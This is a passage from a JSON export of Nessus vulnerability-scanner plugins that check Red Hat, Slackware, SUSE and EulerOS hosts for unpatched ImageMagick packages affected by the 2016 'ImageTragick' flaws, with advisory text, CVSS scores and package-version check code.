value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0726\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-debuginfo-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-debuginfo-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:49", "description": "New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:imagemagick", "p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2016-132-01.NASL", "href": "https://www.tenable.com/plugins/nessus/91046", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-132-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91046);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"SSA\", value:\"2016-132-01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : mozilla-thunderbird (SSA:2016-132-01) (ImageTragick)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mozilla-thunderbird packages are available for Slackware 14.1 and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.359500\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a01f0c3\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.440568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27bd7c00\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick and / or mozilla-thunderbird packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.7.7_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.8.6_10\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"imagemagick\", pkgver:\"6.9.4_1\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.1.0\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:55", "description": "This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution attacks, these coders have now been disabled. They can be re-enabled by exporting the following environment variable MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo dules-Q16/coders/vu lnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral' pseudo protocol which deletes files after reading.\n\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo protocol with any extension in any folder.\n\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label' pseudo protocol to get content of the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-13T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libMagickCore1", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1275-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1275-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91119);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"SUSE SLES11 Security Update : ImageMagick (SUSE-SU-2016:1275-1) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ImageMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Several coders were vulnerable to remote code execution\n attacks, these coders have now been disabled. They can\n be re-enabled by exporting the following environment\n variable\n MAGICK_CODER_MODULE_PATH=/usr/lib64/ImageMagick-6.4.3/mo\n dules-Q16/coders/vu lnerable/ (bsc#978061)\n\n - CVE-2016-3714: Insufficient shell characters filtering\n leads to (potentially remote) code execution\n\n - CVE-2016-3715: Possible file deletion by using\n ImageMagick's 'ephemeral' pseudo protocol which deletes\n files after reading.\n\n - CVE-2016-3716: Possible file moving by using\n ImageMagick's 'msl' pseudo protocol with any extension\n in any folder.\n\n - CVE-2016-3717: Possible local file read by using\n ImageMagick's 'label' pseudo protocol to get content of\n the files from the server.\n\n - CVE-2016-3718: Possible Server Side Request Forgery\n (SSRF) to make HTTP GET or FTP request.\n\nBugs fixed :\n\n - Use external svg loader (rsvg)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3714/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3715/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3716/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3717/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3718/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161275-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e254931\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5 :\n\nzypper in -t patch sleclo50sp3-ImageMagick-12549=1\n\nSUSE Manager Proxy 2.1 :\n\nzypper in -t patch slemap21-ImageMagick-12549=1\n\nSUSE Manager 2.1 :\n\nzypper in -t patch sleman21-ImageMagick-12549=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS :\n\nzypper in -t patch slessp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-ImageMagick-12549=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2 :\n\nzypper in -t patch dbgsp2-ImageMagick-12549=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libMagickCore1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"libMagickCore1-32bit-6.4.3.6-7.34.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"libMagickCore1-6.4.3.6-7.34.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:44:36", "description": "According to the versions of the ImageMagick packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.(CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ImageMagick", "p-cpe:/a:huawei:euleros:imagemagick-c%2b%2b", "p-cpe:/a:huawei:euleros:ImageMagick-perl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1021.NASL", "href": "https://www.tenable.com/plugins/nessus/99784", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99784);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"EulerOS 2.0 SP1 : ImageMagick (EulerOS-SA-2016-1021)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that ImageMagick did not properly\n sanitize certain input before passing it to the\n delegate functionality. A remote attacker could create\n a specially crafted image that, when processed by an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities, would lead to\n arbitrary execution of shell commands with the\n privileges of the user running the\n application.(CVE-2016-3714)\n\n - It was discovered that certain ImageMagick coders and\n pseudo-protocols did not properly prevent security\n sensitive operations when processing specially crafted\n images. A remote attacker could create a specially\n crafted image that, when processed by an application\n using ImageMagick or an unsuspecting user using the\n ImageMagick utilities, would allow the attacker to\n delete, move, or disclose the contents of arbitrary\n files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n - A server-side request forgery flaw was discovered in\n the way ImageMagick processed certain images. A remote\n attacker could exploit this flaw to mislead an\n application using ImageMagick or an unsuspecting user\n using the ImageMagick utilities into, for example,\n performing HTTP(S) requests or opening FTP sessions via\n specially crafted images. (CVE-2016-3718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7e626634\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ImageMagick packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 